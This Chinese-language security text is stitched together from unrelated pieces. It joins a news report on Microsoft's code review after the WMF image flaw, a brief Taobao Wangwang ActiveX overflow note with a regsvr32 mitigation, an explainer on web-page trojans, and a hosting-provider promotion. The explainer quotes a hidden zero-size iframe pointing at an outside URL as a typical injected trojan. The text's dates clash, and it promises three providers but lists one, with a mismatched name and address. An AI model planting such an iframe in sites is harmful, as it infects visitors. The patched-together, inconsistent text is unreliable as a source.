微軟計(jì)畫(huà)搜遍Windows原始碼找出和最近嚴(yán)重漏洞類似的瑕庛，并且更新其開(kāi)發(fā)作業(yè)程式以防止未來(lái)產(chǎn)品再出現(xiàn)同樣問(wèn)題。

　　這只存在于WindowsMetaFile圖片開(kāi)啟過(guò)程中的嚴(yán)重瑕庛和過(guò)去的安全弱點(diǎn)不太一樣，微軟安全回應(yīng)中心總監(jiān)KevinKean及DebbyFryWilson指出。一般弱點(diǎn)是程式間看不到的可讓駭客乘虛而入并執(zhí)行程式碼的縫隙。而WMF的問(wèn)題則存在于無(wú)意中使用到的軟體功能中。

　　為因應(yīng)新式威脅的產(chǎn)生，這家軟體巨人表示將重新檢視不論是新軟體或舊軟體的程式碼，已避免類似的副作用再發(fā)生。

　　“現(xiàn)在我們知道有此類攻擊，客戶可以放心我們會(huì)檢查軟體中任何和此類攻擊相關(guān)的弱點(diǎn)，”FryWilson說(shuō)。

　　微軟自2002年宣布信賴運(yùn)算的大方向計(jì)畫(huà)后，就不斷試圖改善其軟體安全。WMF計(jì)畫(huà)對(duì)該公司的努力不啻是一個(gè)反面宣傳?！斑@問(wèn)題應(yīng)該幾年前就解決了，”Gartner分析師NeilMacDonald說(shuō)，“他們漏了圖片檔，才讓W(xué)MF問(wèn)題發(fā)生。”

　　分析師表示，微軟現(xiàn)在正處于和網(wǎng)路罪犯競(jìng)賽中，他們也正積極找出同樣的漏洞好先下手為強(qiáng)。

　　WMF檔是在1980年代末期設(shè)計(jì)，用來(lái)使圖片檔包含可在PC上執(zhí)行的電腦程式，可以使跑得較慢的機(jī)器開(kāi)大型圖檔的速度較快，芬蘭安全公司F-Secure研究總監(jiān)MikkoHypponen指出，“它并不是一種臭蟲(chóng)，而是應(yīng)當(dāng)時(shí)之需而生的產(chǎn)品，不是很理想的設(shè)計(jì)?！彼f(shuō)。

　　而撰寫(xiě)出WMF漏洞修補(bǔ)程式的歐洲軟體開(kāi)發(fā)人員IlfakGuifanov表示，“WMF創(chuàng)造的那個(gè)年代資訊安全并不是軟體設(shè)計(jì)最關(guān)心的問(wèn)題。”

　　一個(gè)被安裝修補(bǔ)程式的Windows機(jī)器只要一造訪包含有惡意程式圖片的網(wǎng)站，或打開(kāi)一個(gè)包括該圖片的郵件或Office文件檔，就會(huì)遭到入侵。該漏洞被報(bào)導(dǎo)后已出現(xiàn)利用該漏洞的多項(xiàng)攻擊行動(dòng)，包括數(shù)千個(gè)惡意程式網(wǎng)站、木馬程式、以及一件以上的即時(shí)通訊軟體的病蟲(chóng)。德國(guó)馬德堡大學(xué)防毒軟體專員AndreasMarx表示至少已有上百萬(wàn)臺(tái)電腦受害。

　　回應(yīng)速度

　　微軟FryWilson表示，微軟僅僅在漏洞被公布十天之后就釋出修補(bǔ)程式，是有史以來(lái)最快的一次。

　　雖然在修補(bǔ)上創(chuàng)了紀(jì)錄，但該公司還是漏洞種類感到很意外?！斑@不是一般的緩沖溢位(bufferoverflow)，一般軟體可以預(yù)期使用行為，但我們沒(méi)有料到會(huì)有這種用法，”Kean說(shuō)。

　　而新學(xué)到的一課也有助于這家軟體巨人生聚教訓(xùn)。微軟將更新其為防止產(chǎn)品安全問(wèn)題而設(shè)計(jì)讓開(kāi)發(fā)人員遵循的“安全開(kāi)發(fā)生命周期”(SecurityDevelopmentLifeCycle,SDL)作業(yè)程序。程序包含該公司用以檢查程式碼問(wèn)題的威脅模型系統(tǒng)(threat-modelingsystem)。

　　“我們會(huì)修改SDL中的資料，并重建威脅模型系統(tǒng)，以便找出任何類似的瑕庛。”FryWilson說(shuō)。

　　微軟的開(kāi)發(fā)流程中會(huì)檢查出一般開(kāi)發(fā)人員會(huì)犯的錯(cuò)誤，像是緩沖溢位、整數(shù)溢位(integeroverflow)及stackoverflow等漏洞。

　　SDL原本每六個(gè)月更新一次。微軟并在數(shù)年前成立一個(gè)專門(mén)在研究問(wèn)題的小組。有了這些安全程序，就可以不用把大量開(kāi)發(fā)資源用于全面性的安全檢查上。

　　安全專家表示，微軟檢視整個(gè)程式碼并改善開(kāi)發(fā)作業(yè)程式這件事做得很對(duì)?！拔④浽谡页霾⑿扪a(bǔ)漏洞上態(tài)度愈來(lái)愈積極，”SANSInstitute主任研究員JohannesUllrich說(shuō)。

　　弱點(diǎn)管理公司nCricle弱點(diǎn)與攻擊研究總監(jiān)MikeMurray指出，“他們也只能這么做，因?yàn)檫@是一項(xiàng)新弱點(diǎn)，不管是好人或壞人都會(huì)想把它找出來(lái)?！?/P>

　　雖然微軟指出，這是新的問(wèn)題，但Guifanov并不這么認(rèn)為?！疤?yáng)底下沒(méi)有什么是真的新鮮事，這是設(shè)計(jì)上的瑕庛，程式檢查不應(yīng)該常常來(lái)，但偶一為之無(wú)妨?！?/P>

　　他指出，WMF問(wèn)題和過(guò)去Office檔案的巨集病毒類似，“資料包括程式碼(code-in-data)很好用，但一不小心即會(huì)讓你很頭痛，控制機(jī)制應(yīng)該要能關(guān)閉嵌入式程式碼的執(zhí)行?！?/P>

　　由于許多圖片相當(dāng)復(fù)雜，而且許多應(yīng)用都得支援它，因而開(kāi)啟攻擊者新的入侵之門(mén)。

　　而安全公司也正致力于尋找新種漏洞。例如F-Secure正在觀察WindowsMobile軟體是否也有WMF漏洞?！拔也恢牢④浭遣皇菚?huì)找到很多類似的漏洞，但我屏息以待?！盚ypponen說(shuō)。

文檔維護(hù)：tombkeeper[Base64Decode("dG9tYmtlZXBlckB4Zm9jdXMub3Jn")]
文檔創(chuàng)建：2007年02月09日
最后更改：2006年02月09日

cocoruder去年底向阿里巴巴報(bào)了一個(gè)淘寶旺旺ActiveX控件溢出的漏洞：

那么作為普通用戶，如何保護(hù)自己呢？

很簡(jiǎn)單，運(yùn)行系統(tǒng)的“命令提示符”，在其中輸入：
regsvr32 /u %SystemRoot%\System32\aliedit\pta.dll

這樣就解除了pta.dll在系統(tǒng)中的注冊(cè)，任何網(wǎng)頁(yè)都無(wú)法調(diào)用它。大家再訪問(wèn)上面的鏈接就不會(huì)崩潰了。

 什么是網(wǎng)頁(yè)病毒?
　　它主要是利用網(wǎng)站的安全漏洞，通過(guò)執(zhí)行嵌入在網(wǎng)頁(yè)HTML超文本標(biāo)記語(yǔ)言內(nèi)的JavaApplet小應(yīng)用程序，JavaScript腳本語(yǔ)言程序，ActiveX軟件部件網(wǎng)絡(luò)交互技術(shù)支持可自動(dòng)執(zhí)行的代碼程序，以強(qiáng)行修改用戶操作系統(tǒng)的注冊(cè)表設(shè)置及系統(tǒng)實(shí)用配置程序，或非法控制系統(tǒng)資源盜取用戶文件，或惡意刪除硬盤(pán)文件、格式化硬盤(pán)為行為目標(biāo)的非法惡意程序。現(xiàn)在流行的網(wǎng)頁(yè)木馬大多是：〈iframesrc=http://www.haogs.com/mm.htmwidth=0height=0>　這樣的格式，通過(guò)隱藏在一些安全等級(jí)不高的網(wǎng)站內(nèi)，只要瀏覽該網(wǎng)站的用戶都可能中病毒和木馬。這種非法惡意程序能夠得以被自動(dòng)執(zhí)行，在于它完全不受用戶的控制。你一旦瀏覽含有該病毒的網(wǎng)頁(yè)，即可以在你不知不覺(jué)的情況下馬上中招，給用戶的系統(tǒng)帶來(lái)一般性的、輕度性的、嚴(yán)重惡性等不同程度的破壞。令你苦不堪言，甚至損失慘重?zé)o法彌補(bǔ)。
　　
　　網(wǎng)站被掛木馬的主要原因
　 目前國(guó)內(nèi)的大多數(shù)中小網(wǎng)站都是從網(wǎng)絡(luò)上下載的免費(fèi)系統(tǒng)建成的，如動(dòng)網(wǎng)、動(dòng)易、discuz等系統(tǒng)，這些系統(tǒng)在設(shè)計(jì)的時(shí)候存在或多或少的安全漏洞，如動(dòng)網(wǎng)和動(dòng)易以前都存在過(guò)上傳漏洞，導(dǎo)致黑客可以上傳木馬至網(wǎng)站，輕易獲得管理權(quán)限。同時(shí)Win2003本身也存在設(shè)計(jì)缺陷，如前段時(shí)間出現(xiàn)的新漏洞：“IIS6目錄檢查漏洞”。加之很多網(wǎng)站管理員的安全水平有限，目前網(wǎng)頁(yè)病毒木馬非常猖獗。

   如何提高網(wǎng)站安全
   作為網(wǎng)站的管理員，顯示有必要防止黑客入侵，以防止給網(wǎng)站的用戶帶來(lái)安全風(fēng)險(xiǎn)，同時(shí)可能發(fā)生資料泄露、文件被刪除等嚴(yán)重問(wèn)題。目前大多數(shù)網(wǎng)站都是以虛擬主機(jī)的形式托管的，要提高網(wǎng)站安全，需要從兩方面入手。一方面，網(wǎng)站管理員應(yīng)及時(shí)給自己的網(wǎng)站程序打上最新的補(bǔ)丁，在開(kāi)發(fā)的時(shí)候應(yīng)加強(qiáng)安全意識(shí)，注意防止注入漏洞、上傳漏洞等問(wèn)題。另一方面，將網(wǎng)站托管在技術(shù)實(shí)力強(qiáng)、安全系數(shù)高、能主動(dòng)幫客戶解決安全的服務(wù)商處也可以加強(qiáng)您的網(wǎng)站安全。
　
　筆者比較了國(guó)內(nèi)目前在虛擬主機(jī)安全方面做的比較好的三家公司，進(jìn)行一些對(duì)比分析，希望能對(duì)您有所幫助：

1.西部數(shù)碼http://www.35.com
35互聯(lián)是一家專業(yè)服務(wù)于全球中小企業(yè)和商務(wù)人士的互聯(lián)網(wǎng)應(yīng)用服務(wù)提供商（ASP）,是中國(guó)首家獲得ICANN認(rèn)證和CNNIC首批認(rèn)證的頂級(jí)域名注冊(cè)服務(wù)機(jī)構(gòu).

三五互聯(lián)的虛擬主機(jī)控制面板中也提供了很多關(guān)于網(wǎng)絡(luò)安全方面的功能，如頁(yè)面加密，ip地址限制(不能設(shè)置子目錄)、文件保護(hù)功能可以防止重要文件如數(shù)據(jù)庫(kù)被人下載。

當(dāng)然國(guó)內(nèi)還有其他一些公司也在主動(dòng)加強(qiáng)網(wǎng)站安全方面有所突破，限于篇幅原因，不再介紹。大家在選購(gòu)虛擬主機(jī)的時(shí)候，不要光看價(jià)格，找一家知名的品牌服務(wù)商，最好找能進(jìn)行免費(fèi)試用的主機(jī)，試用幾天，一定能找到適合自己的虛擬主機(jī)產(chǎn)品。

 只要網(wǎng)站管理員和虛擬主機(jī)服務(wù)商共同努力，一定能解決好目前網(wǎng)頁(yè)木馬病毒泛濫的問(wèn)題。